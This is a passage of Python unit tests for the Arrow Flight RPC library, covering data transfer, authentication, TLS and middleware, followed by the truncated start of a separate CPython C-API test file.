data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
table = pa.Table.from_arrays(data1, names=['a'])
with CheckTicketFlightServer(expected_ticket=b'the-ticket') as server:
client = flight.connect(('localhost', server.port))
data = client.do_get(flight.Ticket(b'the-ticket')).read_all()
assert data.equals(table)
def test_flight_get_info():
"""Make sure FlightEndpoint accepts string and object URIs."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_flight_info(flight.FlightDescriptor.for_command(b''))
assert info.total_records == -1
assert info.total_bytes == -1
assert info.schema == pa.schema([('a', pa.int32())])
assert len(info.endpoints) == 2
assert len(info.endpoints[0].locations) == 1
assert info.endpoints[0].locations[0] == flight.Location('grpc://test')
assert info.endpoints[1].locations[0] == \
flight.Location.for_grpc_tcp('localhost', 5005)
def test_flight_get_schema():
"""Make sure GetSchema returns correct schema."""
with GetInfoFlightServer() as server:
client = FlightClient(('localhost', server.port))
info = client.get_schema(flight.FlightDescriptor.for_command(b''))
assert info.schema == pa.schema([('a', pa.int32())])
def test_list_actions():
"""Make sure the return type of ListActions is validated."""
# ARROW-6392
with ListActionsErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(
flight.FlightServerError,
match=("Results of list_actions must be "
"ActionType or tuple")
):
list(client.list_actions())
with ListActionsFlightServer() as server:
client = FlightClient(('localhost', server.port))
assert list(client.list_actions()) == \
ListActionsFlightServer.expected_actions()
class ConvenienceServer(FlightServerBase):
"""
Server for testing various implementation conveniences (auto-boxing, etc.)
"""
@property
def simple_action_results(self):
return [b'foo', b'bar', b'baz']
def do_action(self, context, action):
if action.type == 'simple-action':
return self.simple_action_results
elif action.type == 'echo':
return [action.body]
elif action.type == 'bad-action':
return ['foo']
elif action.type == 'arrow-exception':
raise pa.ArrowMemoryError()
def test_do_action_result_convenience():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
# do_action as action type without body
results = [x.body for x in client.do_action('simple-action')]
assert results == server.simple_action_results
# do_action with tuple of type and body
body = b'the-body'
results = [x.body for x in client.do_action(('echo', body))]
assert results == [body]
def test_nicer_server_exceptions():
with ConvenienceServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightServerError,
match="a bytes-like object is required"):
list(client.do_action('bad-action'))
# While Flight/C++ sends across the original status code, it
# doesn't get mapped to the equivalent code here, since we
# want to be able to distinguish between client- and server-
# side errors.
with pytest.raises(flight.FlightServerError,
match="ArrowMemoryError"):
list(client.do_action('arrow-exception'))
def test_get_port():
"""Make sure port() works."""
server = GetInfoFlightServer("grpc://localhost:0")
try:
assert server.port > 0
finally:
server.shutdown()
@pytest.mark.skipif(os.name == 'nt',
reason="Unix sockets can't be tested on Windows")
def test_flight_domain_socket():
"""Try a simple do_get call over a Unix domain socket."""
with tempfile.NamedTemporaryFile() as sock:
sock.close()
location = flight.Location.for_grpc_unix(sock.name)
with ConstantFlightServer(location=location):
client = FlightClient(location)
reader = client.do_get(flight.Ticket(b'ints'))
table = simple_ints_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
reader = client.do_get(flight.Ticket(b'dicts'))
table = simple_dicts_table()
assert reader.schema.equals(table.schema)
data = reader.read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with EchoFlightServer(expected_schema=data.schema) as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with EchoStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, _ = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with InvalidStreamFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightTimedOutError):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
options = flight.FlightCallOptions(timeout=5.0)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
@pytest.mark.slow
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*unauthenticated.*"):
list(client.do_action(action))
@pytest.mark.skipif(os.name == 'nt',
reason="ARROW-10013: gRPC on Windows corrupts peer()")
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
results = client.do_action(action)
identity = next(results)
assert identity.body.to_pybytes() == b'test'
peer_address = next(results)
assert peer_address.body.to_pybytes() != b''
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with EchoStreamFlightServer(auth_handler=basic_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
with pytest.raises(flight.FlightUnauthenticatedError,
match=".*wrong password.*"):
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with EchoStreamFlightServer(auth_handler=token_auth_handler) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
header_auth_server_middleware_factory = HeaderAuthServerMiddlewareFactory()
no_op_auth_handler = NoopAuthHandler()
def test_authenticate_basic_token():
"""Test authenticate_basic_token with bearer token and auth headers."""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
token_pair = client.authenticate_basic_token(b'test', b'password')
assert token_pair[0] == b'authorization'
assert token_pair[1] == b'Bearer token1234'
def test_authenticate_basic_token_invalid_password():
"""Test authenticate_basic_token with an invalid password."""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightUnauthenticatedError):
client.authenticate_basic_token(b'test', b'badpassword')
def test_authenticate_basic_token_and_action():
"""Test authenticate_basic_token and doAction after authentication."""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
token_pair = client.authenticate_basic_token(b'test', b'password')
assert token_pair[0] == b'authorization'
assert token_pair[1] == b'Bearer token1234'
options = flight.FlightCallOptions(headers=[token_pair])
result = list(client.do_action(
action=flight.Action('test-action', b''), options=options))
assert result[0].body.to_pybytes() == b'token1234'
def test_authenticate_basic_token_with_client_middleware():
"""Test authenticate_basic_token with client middleware
to intercept authorization header returned by the
HTTP header auth enabled server.
"""
with HeaderAuthFlightServer(auth_handler=no_op_auth_handler, middleware={
"auth": HeaderAuthServerMiddlewareFactory()
}) as server:
client_auth_middleware = ClientHeaderAuthMiddlewareFactory()
client = FlightClient(
('localhost', server.port),
middleware=[client_auth_middleware]
)
encoded_credentials = base64.b64encode(b'test:password')
options = flight.FlightCallOptions(headers=[
(b'authorization', b'Basic ' + encoded_credentials)
])
result = list(client.do_action(
action=flight.Action('test-action', b''), options=options))
assert result[0].body.to_pybytes() == b'token1234'
assert client_auth_middleware.call_credential[0] == b'authorization'
assert client_auth_middleware.call_credential[1] == \
b'Bearer ' + b'token1234'
result2 = list(client.do_action(
action=flight.Action('test-action', b''), options=options))
assert result2[0].body.to_pybytes() == b'token1234'
assert client_auth_middleware.call_credential[0] == b'authorization'
assert client_auth_middleware.call_credential[1] == \
b'Bearer ' + b'token1234'
def test_arbitrary_headers_in_flight_call_options():
"""Test passing multiple arbitrary headers to the middleware."""
with ArbitraryHeadersFlightServer(
auth_handler=no_op_auth_handler,
middleware={
"auth": HeaderAuthServerMiddlewareFactory(),
"arbitrary-headers": ArbitraryHeadersServerMiddlewareFactory()
}) as server:
client = FlightClient(('localhost', server.port))
token_pair = client.authenticate_basic_token(b'test', b'password')
assert token_pair[0] == b'authorization'
assert token_pair[1] == b'Bearer token1234'
options = flight.FlightCallOptions(headers=[
token_pair,
(b'test-header-1', b'value1'),
(b'test-header-2', b'value2')
])
result = list(client.do_action(flight.Action(
"test-action", b""), options=options))
assert result[0].body.to_pybytes() == b'value1'
assert result[1].body.to_pybytes() == b'value2'
def test_location_invalid():
"""Test constructing invalid URIs."""
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
flight.connect("%")
with pytest.raises(pa.ArrowInvalid, match=".*Cannot parse URI:.*"):
ConstantFlightServer("%")
def test_location_unknown_scheme():
"""Test creating locations for unknown schemes."""
assert flight.Location("s3://foo").uri == b"s3://foo"
assert flight.Location("https://example.com/bar.parquet").uri == \
b"https://example.com/bar.parquet"
@pytest.mark.slow
@pytest.mark.requires_testing_data
def test_tls_fails():
"""Make sure clients cannot connect when cert verification fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Ensure client doesn't connect when certificate verification
# fails (this is a slow test since gRPC does retry a few times)
client = FlightClient("grpc+tls://localhost:" + str(s.port))
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.requires_testing_data
def test_tls_do_get():
"""Try a simple do_get call over TLS."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = FlightClient(('localhost', s.port),
tls_root_certs=certs["root_cert"])
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_disable_server_verification():
"""Try a simple do_get call over TLS with server verification disabled."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
try:
client = FlightClient(('localhost', s.port),
disable_server_verification=True)
except NotImplementedError:
pytest.skip('disable_server_verification feature is not available')
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_override_hostname():
"""Check that incorrectly overriding the hostname fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
override_hostname="fakehostname")
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
def test_flight_do_get_metadata():
"""Try a simple do_get call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
batches = []
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
idx = 0
while True:
try:
batch, metadata = reader.read_chunk()
batches.append(batch)
server_idx, = struct.unpack('<i', metadata.to_pybytes())
assert idx == server_idx
idx += 1
except StopIteration:
break
data = pa.Table.from_batches(batches)
assert data.equals(table)
def test_flight_do_get_metadata_v4():
"""Try a simple do_get call with V4 metadata version."""
table = pa.Table.from_arrays(
[pa.array([-10, -5, 0, 5, 10])], names=['a'])
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with MetadataFlightServer(options=options) as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
data = reader.read_all()
assert data.equals(table)
def test_flight_do_put_metadata():
"""Try a simple do_put call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
with writer:
for idx, batch in enumerate(table.to_batches(max_chunksize=1)):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
buf = metadata_reader.read()
assert buf is not None
server_idx, = struct.unpack('<i', buf.to_pybytes())
assert idx == server_idx
def test_flight_do_put_limit():
"""Try a simple do_put call with a size limit."""
large_batch = pa.RecordBatch.from_arrays([
pa.array(np.ones(768, dtype=np.int64())),
], names=['a'])
with EchoFlightServer() as server:
client = FlightClient(('localhost', server.port),
write_size_limit_bytes=4096)
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
large_batch.schema)
with writer:
with pytest.raises(flight.FlightWriteSizeExceededError,
match="exceeded soft limit") as excinfo:
writer.write_batch(large_batch)
assert excinfo.value.limit == 4096
smaller_batches = [
large_batch.slice(0, 384),
large_batch.slice(384),
]
for batch in smaller_batches:
writer.write_batch(batch)
expected = pa.Table.from_batches([large_batch])
actual = client.do_get(flight.Ticket(b'')).read_all()
assert expected == actual
@pytest.mark.slow
def test_cancel_do_get():
"""Test canceling a DoGet operation on the client side."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
reader.cancel()
with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"):
reader.read_chunk()
@pytest.mark.slow
def test_cancel_do_get_threaded():
"""Test canceling a DoGet operation from another thread."""
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
read_first_message = threading.Event()
stream_canceled = threading.Event()
result_lock = threading.Lock()
raised_proper_exception = threading.Event()
def block_read():
reader.read_chunk()
read_first_message.set()
stream_canceled.wait(timeout=5)
try:
reader.read_chunk()
except flight.FlightCancelledError:
with result_lock:
raised_proper_exception.set()
thread = threading.Thread(target=block_read, daemon=True)
thread.start()
read_first_message.wait(timeout=5)
reader.cancel()
stream_canceled.set()
thread.join(timeout=1)
with result_lock:
assert raised_proper_exception.is_set()
def test_roundtrip_types():
"""Make sure serializable types round-trip."""
ticket = flight.Ticket("foo")
assert ticket == flight.Ticket.deserialize(ticket.serialize())
desc = flight.FlightDescriptor.for_command("test")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
info = flight.FlightInfo(
pa.schema([('a', pa.int32())]),
desc,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
info2 = flight.FlightInfo.deserialize(info.serialize())
assert info.schema == info2.schema
assert info.descriptor == info2.descriptor
assert info.total_bytes == info2.total_bytes
assert info.total_records == info2.total_records
assert info.endpoints == info2.endpoints
def test_roundtrip_errors():
"""Ensure that Flight errors propagate from server to client."""
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.do_action(flight.Action("internal", b"")))
with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"):
list(client.do_action(flight.Action("timedout", b"")))
with pytest.raises(flight.FlightCancelledError, match=".*foo.*"):
list(client.do_action(flight.Action("cancel", b"")))
with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthenticated", b"")))
with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthorized", b"")))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.list_flights())
def test_do_put_independent_read_write():
"""Ensure that separate threads can read/write on a DoPut."""
# ARROW-6063: previously this would cause gRPC to abort when the
# writer was closed (due to simultaneous reads), or would hang
# forever.
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
count = [0]
def _reader_thread():
while metadata_reader.read() is not None:
count[0] += 1
thread = threading.Thread(target=_reader_thread)
thread.start()
batches = table.to_batches(max_chunksize=1)
with writer:
for idx, batch in enumerate(batches):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
# Causes the server to stop writing and end the call
writer.done_writing()
# Thus reader thread will break out of loop
thread.join()
# writer.close() won't segfault since reader thread has
# stopped
assert count[0] == len(batches)
def test_server_middleware_same_thread():
"""Ensure that server middleware run on the same thread as the RPC."""
with HeaderFlightServer(middleware={
"test": HeaderServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
results = list(client.do_action(flight.Action(b"test", b"")))
assert len(results) == 1
value = results[0].body.to_pybytes()
assert b"right value" == value
def test_middleware_reject():
"""Test rejecting an RPC with server middleware."""
with HeaderFlightServer(middleware={
"test": SelectiveAuthServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
# The middleware allows this through without auth.
with pytest.raises(pa.ArrowNotImplementedError):
list(client.list_actions())
# But not anything else.
with pytest.raises(flight.FlightUnauthenticatedError):
list(client.do_action(flight.Action(b"", b"")))
client = FlightClient(
('localhost', server.port),
middleware=[SelectiveAuthClientMiddlewareFactory()]
)
response = next(client.do_action(flight.Action(b"", b"")))
assert b"password" == response.body.to_pybytes()
def test_middleware_mapping():
"""Test that middleware records methods correctly."""
server_middleware = RecordingServerMiddlewareFactory()
client_middleware = RecordingClientMiddlewareFactory()
with FlightServerBase(middleware={"test": server_middleware}) as server:
client = FlightClient(
('localhost', server.port),
middleware=[client_middleware]
)
descriptor = flight.FlightDescriptor.for_command(b"")
with pytest.raises(NotImplementedError):
list(client.list_flights())
with pytest.raises(NotImplementedError):
client.get_flight_info(descriptor)
with pytest.raises(NotImplementedError):
client.get_schema(descriptor)
with pytest.raises(NotImplementedError):
client.do_get(flight.Ticket(b""))
with pytest.raises(NotImplementedError):
writer, _ = client.do_put(descriptor, pa.schema([]))
writer.close()
with pytest.raises(NotImplementedError):
list(client.do_action(flight.Action(b"", b"")))
with pytest.raises(NotImplementedError):
list(client.list_actions())
with pytest.raises(NotImplementedError):
writer, _ = client.do_exchange(descriptor)
writer.close()
expected = [
flight.FlightMethod.LIST_FLIGHTS,
flight.FlightMethod.GET_FLIGHT_INFO,
flight.FlightMethod.GET_SCHEMA,
flight.FlightMethod.DO_GET,
flight.FlightMethod.DO_PUT,
flight.FlightMethod.DO_ACTION,
flight.FlightMethod.LIST_ACTIONS,
flight.FlightMethod.DO_EXCHANGE,
]
assert server_middleware.methods == expected
assert client_middleware.methods == expected
def test_extra_info():
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
try:
list(client.do_action(flight.Action("protobuf", b"")))
assert False
except flight.FlightUnauthorizedError as e:
assert e.extra_info is not None
ei = e.extra_info
assert ei == b'this is an error message'
@pytest.mark.requires_testing_data
def test_mtls():
"""Test mutual TLS (mTLS) with gRPC."""
certs = example_tls_certs()
table = simple_ints_table()
with ConstantFlightServer(
tls_certificates=[certs["certificates"][0]],
verify_client=True,
root_certificates=certs["root_cert"]) as s:
client = FlightClient(
('localhost', s.port),
tls_root_certs=certs["root_cert"],
cert_chain=certs["certificates"][0].cert,
private_key=certs["certificates"][0].key)
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
def test_doexchange_get():
"""Emulate DoGet with DoExchange."""
expected = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"get")
writer, reader = client.do_exchange(descriptor)
with writer:
table = reader.read_all()
assert expected == table
def test_doexchange_put():
"""Emulate DoPut with DoExchange."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"put")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
writer.done_writing()
chunk = reader.read_chunk()
assert chunk.data is None
expected_buf = str(len(batches)).encode("utf-8")
assert chunk.app_metadata == expected_buf
def test_doexchange_echo():
"""Try a DoExchange echo server."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Read/write metadata before starting data.
for i in range(10):
buf = str(i).encode("utf-8")
writer.write_metadata(buf)
chunk = reader.read_chunk()
assert chunk.data is None
assert chunk.app_metadata == buf
# Now write data without metadata.
writer.begin(data.schema)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
# And write data with metadata.
for i, batch in enumerate(batches):
buf = str(i).encode("utf-8")
writer.write_with_metadata(batch, buf)
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata == buf
def test_doexchange_echo_v4():
"""Try a DoExchange echo server using the V4 metadata version."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=["a"])
batches = data.to_batches(max_chunksize=512)
options = pa.ipc.IpcWriteOptions(
metadata_version=pa.ipc.MetadataVersion.V4)
with ExchangeFlightServer(options=options) as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
with writer:
# Now write data without metadata.
writer.begin(data.schema, options=options)
for batch in batches:
writer.write_batch(batch)
assert reader.schema == data.schema
chunk = reader.read_chunk()
assert chunk.data == batch
assert chunk.app_metadata is None
def test_doexchange_transform():
"""Transform a table with a service."""
data = pa.Table.from_arrays([
pa.array(range(0, 1024)),
pa.array(range(1, 1025)),
pa.array(range(2, 1026)),
], names=["a", "b", "c"])
expected = pa.Table.from_arrays([
pa.array(range(3, 1024 * 3 + 3, 3)),
], names=["sum"])
with ExchangeFlightServer() as server:
client = FlightClient(("localhost", server.port))
descriptor = flight.FlightDescriptor.for_command(b"transform")
writer, reader = client.do_exchange(descriptor)
with writer:
writer.begin(data.schema)
writer.write_table(data)
writer.done_writing()
table = reader.read_all()
assert expected == table
def test_middleware_multi_header():
"""Test sending/receiving multiple (binary-valued) headers."""
with MultiHeaderFlightServer(middleware={
"test": MultiHeaderServerMiddlewareFactory(),
}) as server:
headers = MultiHeaderClientMiddlewareFactory()
client = FlightClient(('localhost', server.port), middleware=[headers])
response = next(client.do_action(flight.Action(b"", b"")))
# The server echoes the headers it got back to us.
raw_headers = response.body.to_pybytes().decode("utf-8")
client_headers = ast.literal_eval(raw_headers)
# Don't directly compare; gRPC may add headers like User-Agent.
for header, values in MultiHeaderClientMiddleware.EXPECTED.items():
assert client_headers.get(header) == values
assert headers.last_headers.get(header) == values
@pytest.mark.requires_testing_data
def test_generic_options():
"""Test setting generic client options."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Try setting a string argument that will make requests fail
options = [("grpc.ssl_target_name_override", "fakehostname")]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
# Try setting an int argument that will make requests fail
options = [("grpc.max_receive_message_length", 32)]
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
generic_options=options)
with pytest.raises(pa.ArrowInvalid):
client.do_get(flight.Ticket(b'ints'))
class CancelFlightServer(FlightServerBase):
"""A server for testing StopToken."""
def do_get(self, context, ticket):
schema = pa.schema([])
rb = pa.RecordBatch.from_arrays([], schema=schema)
return flight.GeneratorStream(schema, itertools.repeat(rb))
def do_exchange(self, context, descriptor, reader, writer):
schema = pa.schema([])
rb = pa.RecordBatch.from_arrays([], schema=schema)
writer.begin(schema)
while not context.is_cancelled():
writer.write_batch(rb)
time.sleep(0.5)
def test_interrupt():
if threading.current_thread().ident != threading.main_thread().ident:
pytest.skip("test only works from main Python thread")
# Skips test if not available
raise_signal = util.get_raise_signal()
def signal_from_thread():
time.sleep(0.5)
raise_signal(signal.SIGINT)
exc_types = (KeyboardInterrupt, pa.ArrowCancelled)
def test(read_all):
try:
try:
t = threading.Thread(target=signal_from_thread)
with pytest.raises(exc_types) as exc_info:
t.start()
read_all()
finally:
t.join()
except KeyboardInterrupt:
# In case KeyboardInterrupt didn't interrupt read_all
# above, at least prevent it from stopping the test suite
pytest.fail("KeyboardInterrupt didn't interrupt Flight read_all")
e = exc_info.value.__context__
assert isinstance(e, pa.ArrowCancelled) or \
isinstance(e, KeyboardInterrupt)
with CancelFlightServer() as server:
client = FlightClient(("localhost", server.port))
reader = client.do_get(flight.Ticket(b""))
test(reader.read_all)
descriptor = flight.FlightDescriptor.for_command(b"echo")
writer, reader = client.do_exchange(descriptor)
test(reader.read_all)
def test_never_sends_data():
# Regression test for ARROW-12779
match = "application server implementation error"
with NeverSendsDataFlightServer() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(flight.FlightServerError, match=match):
client.do_get(flight.Ticket(b'')).read_all()
# Check that the server handler will ignore empty tables
# up to a certain extent
table = client.do_get(flight.Ticket(b'yield_data')).read_all()
assert table.num_rows == 5
@pytest.mark.large_memory
@pytest.mark.slow
def test_large_descriptor():
# Regression test for ARROW-13253. Placed here with appropriate marks
# since some CI pipelines can't run the C++ equivalent
large_descriptor = flight.FlightDescriptor.for_command(
b' ' * (2 ** 31 + 1))
with FlightServerBase() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(OSError,
match="Failed to serialize Flight descriptor"):
writer, _ = client.do_put(large_descriptor, pa.schema([]))
writer.close()
with pytest.raises(pa.ArrowException,
match="Failed to serialize Flight descriptor"):
client.do_exchange(large_descriptor)
@pytest.mark.large_memory
@pytest.mark.slow
def test_large_metadata_client():
# Regression test for ARROW-13253
descriptor = flight.FlightDescriptor.for_command(b'')
metadata = b' ' * (2 ** 31 + 1)
with EchoFlightServer() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(pa.ArrowCapacityError,
match="app_metadata size overflow"):
writer, _ = client.do_put(descriptor, pa.schema([]))
with writer:
writer.write_metadata(metadata)
writer.close()
with pytest.raises(pa.ArrowCapacityError,
match="app_metadata size overflow"):
writer, reader = client.do_exchange(descriptor)
with writer:
writer.write_metadata(metadata)
del metadata
with LargeMetadataFlightServer() as server:
client = flight.connect(('localhost', server.port))
with pytest.raises(flight.FlightServerError,
match="app_metadata size overflow"):
reader = client.do_get(flight.Ticket(b''))
reader.read_all()
with pytest.raises(pa.ArrowException,
match="app_metadata size overflow"):
writer, reader = client.do_exchange(descriptor)
with writer:
reader.read_all()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support as support
try:
import thread
import threading
except ImportError:
thread = None
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
skips = []
if support.check_impl_detail(pypy=True):
skips += [
'test_broken_memoryview',
'test_capsule',
'test_lazy_hash_inheritance',
'test_widechar',
'TestThreadState',
'TestPendingCalls',
]
@unittest.skipUnless(threading and 'TestPendingCalls' not in skips, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print "(%i)"%(len(l),),
for i in xrange(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print "(%i)"%(len(l),)
def test_pendingcalls_threaded(self):
